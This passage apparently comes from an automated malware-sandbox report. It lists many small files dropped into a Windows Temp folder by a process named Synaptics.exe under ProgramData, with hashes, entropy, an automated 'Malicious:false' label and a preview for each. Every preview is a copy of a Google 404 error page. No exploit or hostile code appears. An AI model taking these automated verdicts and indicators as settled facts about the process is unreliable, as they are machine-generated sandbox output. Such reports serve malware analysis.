                                                                                                                                                                                        SSDEEP:24:bsF+0ASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+L+pAZewRDK4mW
                                                                                                                                                                                        MD5:6A1326F89335B42F51C212A214F87566
                                                                                                                                                                                        SHA1:C10CCAA5F38CDB7657D8D24E19A651DF318E990D
                                                                                                                                                                                        SHA-256:E8904623B4BB3C74C57E92717B30B166F69DC0E0DFB2BEBFDC5CB1DA9EFFDD42
                                                                                                                                                                                        SHA-512:A5EE5FB9FCF9395E1326394915022DD0B2D64A7E698E444D604E318014903B6D379B8096DDB8BB5C5DBB98546E5EE90F3E04491EFEB4F9EFF1D450176DF3CB8B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mq4Hf68kdigvdaakct4LoA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ghZ6hkA.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.255486156437497
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0XdmSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+6m+pAZewRDK4mW
                                                                                                                                                                                        MD5:BC12AF05CC93DF9A62F63480598DC459
                                                                                                                                                                                        SHA1:C79331FD9C56AAFF26741909D023829978FF7958
                                                                                                                                                                                        SHA-256:2BC9A550B3A1442CCA9EF6E206B74512EC0BB6891D673DB50FFB2AA842141AAD
                                                                                                                                                                                        SHA-512:E91DABABBFAEF41156261FDDB56EAD0E08F7DBDE5FB59B800E0133A53E9044691619E2870B480337540EC9C777A0AB1AC122979B5EC041BAAB072C1A65FD0714
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="g0AA/XF3MU5odpt4QQ9uaA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\hACyzxh.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.265379123793068
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0vSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+g+pAZewRDK4mW
                                                                                                                                                                                        MD5:858E06235C826C7B489AB5E3950AAAB3
                                                                                                                                                                                        SHA1:493DA3CAFD80F8B6FD43F9B562BAAD0175BBC697
                                                                                                                                                                                        SHA-256:A21BFFE02A4601FB6A90871D49B533FB1DF5DA1E42AACBD200AB46D4A9BD4A68
                                                                                                                                                                                        SHA-512:61BC77AE93C2EECF46AA91956A1E8BF648C01AA45E06C3119673C319590FC4D099D42CD82E6A9F44C02A4826CB0E93F954032D50554512097F481B7B6F64A789
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5M1Uw5FT0iaK9VNQmP7YIw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\hCsdKj2.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.279443553389683
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0oX0vSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+ZXI+pAZewRDK4mW
                                                                                                                                                                                        MD5:9F56F9724000BB368B4B00E66B152560
                                                                                                                                                                                        SHA1:25BDADE95A72CD09150A759ED264927BCDD757D6
                                                                                                                                                                                        SHA-256:AFDE97DCDAFFCD1012547D88FDFC09B5B9E8D3F10FB6538109CF60FA92480862
                                                                                                                                                                                        SHA-512:0E85DB45F208D43834E1505B413B7DC6DCD389E544DC8F3E3FFBB52EE924CF1C98F28758CD8850AB7F984C93B02BDEBE897794D8CF8BB35A385C65DC281FB9DA
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EyLk9CNy5H9RVMyLINy8YA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\hDH6bsE.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.27309900886607
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0fISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+2I+pAZewRDK4mW
                                                                                                                                                                                        MD5:5310905FA731E01309B0BB0F76BCB4EA
                                                                                                                                                                                        SHA1:ECD6406B72C3DF67959E8D1DB2BC5AC12CDA129E
                                                                                                                                                                                        SHA-256:611D6DB17D6351C9038886659CF2147F7E2ED5122313051330CD5EB44F164CA6
                                                                                                                                                                                        SHA-512:FD6A6345660C3464D45A75EB38F86491CE255BEFCE7C95D7F0B20390D8B1DE61FE3DE89702E8681648BDEDA7DC77E893585643C896C21B87A4B7736A6B2187BF
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AGseNwVbq9Iv3SBs+UTi6Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\hIdkfGA.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.250110271445041
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0+kSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+E+pAZewRDK4mW
                                                                                                                                                                                        MD5:187AFA7DDD550476453E1F9D22FE725F
                                                                                                                                                                                        SHA1:BC88C6A2DE5BCF3D446FE0DC50592C6AC528BCD7
                                                                                                                                                                                        SHA-256:0EA51BA6D22B383847BCB8C4A2A00EBA56DA298EADB5FA3DC78765FD86248103
                                                                                                                                                                                        SHA-512:85394DDFFE9432073F9C48F3635C86DC6336CEBBEDCEF2AF0857ED1C685072FFFAC1A5FBAF8905DF8B28A8EFFF522966456D1E2C0AA3945103E3C8FC1E1A0CC0
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="orXrNldCcCiKv++4b/7raQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\hV1inxT.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.288321095981898
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0cSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+/+pAZewRDK4mW
                                                                                                                                                                                        MD5:17E6DC5FCB62207ECA7F47ACDB515632
                                                                                                                                                                                        SHA1:529E58DE3B5B9070F623F15FFB0D715EF3199282
                                                                                                                                                                                        SHA-256:5AB3069CFD170CC7994C153A12C7A11DF4B7FD2E67C6C83AF670B4A3ABAAF62A
                                                                                                                                                                                        SHA-512:B5001AAB8E57A36670AA0BFFA1295CE6C6BFA0E38895A2771C219B3AB96B4F66D5BE901C791E45A82FF4F1DA0C8BBF471F42E04ACED7818501713463E97EC688
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GjW+S8KsJsqHQMsQICOwRA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\hyH5Twh.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.267662249855758
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0GKSqSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+IJ+pAZewRDK4mW
                                                                                                                                                                                        MD5:519539576066E9855BA495023A1A732A
                                                                                                                                                                                        SHA1:839199E521CB2E8B9BBAB89CFA1CE665A9048BAC
                                                                                                                                                                                        SHA-256:5A4469E38E82D0B29ABD190A2AA6F4D15A657EE5BF8CC0C96FD3FE8AFF63205E
                                                                                                                                                                                        SHA-512:8E0AE922D82A73F9DDCBF45A3DB865E388540B1C78A979AE288D525285ACA30A386968AA7AE161F0D1D457BBC1FCE823AF7AFC69E4BBC330F51D27EB3B075687
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KRTbZrgq1eJCQEXER7xsvA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\iiZnjn2.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.265033231465322
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+08SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+H+pAZewRDK4mW
                                                                                                                                                                                        MD5:685C99EE70323CD90E14124232EBA8C0
                                                                                                                                                                                        SHA1:CB9610F708A85CA3B9DD7C86F1DE35DF9EDB2393
                                                                                                                                                                                        SHA-256:7D0DBD44BB84F8B00DA41D624D426793B1C2A6BBC34924D567B8E4E5429C3FF5
                                                                                                                                                                                        SHA-512:3A7093CB4F9F5DD76A37CA4DFA8FF7B620F6A580705B0D30C99EE479FF387F93883DB170B9E852508CE2D3585A01F80FEBC3D043621DF7F2732977839C3B4D00
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NP3GM3pIqnPHZdP3bafOaw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\impZHor.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.255653941155792
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0YbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+lb+pAZewRDK4mW
                                                                                                                                                                                        MD5:B6A9BEE2663F2C1C2B03E017208FD250
                                                                                                                                                                                        SHA1:76799CF95B856375FD97F2D7C13901DAD8AD175B
                                                                                                                                                                                        SHA-256:354FF319CD57F5826EB8EF15A23EB796A5B2EDB5E8A85A7301FD8472E2E4018E
                                                                                                                                                                                        SHA-512:C3724BEB0A352632E3453FA362C539EE514945D895D6EC8C2DA1E24D912710E867629218A4EF1CE3A0C3C9239B55C0A0FFE2C57CB76C2D30A9B8785DA85BAB65
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fDF8syrf0PCe42d2tryOjQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ipBds4M.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.257611062616005
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0HbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Cb+pAZewRDK4mW
                                                                                                                                                                                        MD5:E2AB4A683ABDEC1324ACCA500DB3AB51
                                                                                                                                                                                        SHA1:235814169CCA3DEFAF36417F8CCAD59CEAA5073D
                                                                                                                                                                                        SHA-256:04B0B420B392B738C8189E18A00458AA7C87F0B4CA4EA4152913FA462BBBC449
                                                                                                                                                                                        SHA-512:DDF1B3DD331CA0C9653A9F5006400BC9436C77194E19864B93D96946813A927D541E5A40804955A64C96EC153E83B241E05856B78291600066B9B99BEB4D849D
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EtAoQijmvVqtQWdlhuBXug">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\itWcxUB.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.259346760593007
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+c+pAZewRDK4mW
                                                                                                                                                                                        MD5:7747A56E81A5A7137A2EA4CCE646AC4B
                                                                                                                                                                                        SHA1:F86BCE3D31EB473DDD71D645CA9B2309BFA264F5
                                                                                                                                                                                        SHA-256:6C1837139704307193E4A9AB52BDCC0D6CB00D4B5645E3713DEAEA129570D9D8
                                                                                                                                                                                        SHA-512:9F14C3E5CB90D133257E971552A8D1FE105A0AE96218D843FD36D95077B015B9C9E8A929786F283E53E7DC68DE18B03EEA7188FE7DFD14795E4F146D53DD3752
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0ULJ4nYdLnirQ0q3kxI1jA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\j4b1wvJ.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.255979307244519
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+04vokbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+1QW+pAZewRDK4mW
                                                                                                                                                                                        MD5:D588A356973B33208C543573AFD5A55E
                                                                                                                                                                                        SHA1:98C93BDC11E931D5A43DC0DDD564EF4012657869
                                                                                                                                                                                        SHA-256:461743ADC3D15BC7DA738FB714AA2060FFAFBBF30008121F1F7DA7E86DE6EFD4
                                                                                                                                                                                        SHA-512:8B1875D1802E69122B8F1AF42504239807375CE59739CA432EB88CD25FD6AC0CFD5BB0021C8D1489D33988EB2A4AF28CDF9E2338AC5D1025B6B12B70449A1BF5
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7c1gBeJob4sVbrAQf89vJQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jH9ncqU.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2650858570982315
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0lPXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+EPX+pAZewRDK4mW
                                                                                                                                                                                        MD5:D9656AE9ECBE4137EEBF872DE8121010
                                                                                                                                                                                        SHA1:ED99C2A7CCB9173FA289D25477CCF80F80DC58BA
                                                                                                                                                                                        SHA-256:1E5D941D2FA30BD526A147705C6D2F2D86F6615F56B21D29796AAF214C07C976
                                                                                                                                                                                        SHA-512:46A52BBD5F3DAB493E602CC43D53D5D30B3E8112E3CA73F2BAC87A032C4FFA8918D111E641F5113D988749F010F685F7DBDFBD94AE021226320BBA92C48DD629
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iLADmT/H5OClqufoZBFyXg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jHhQRJ8.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
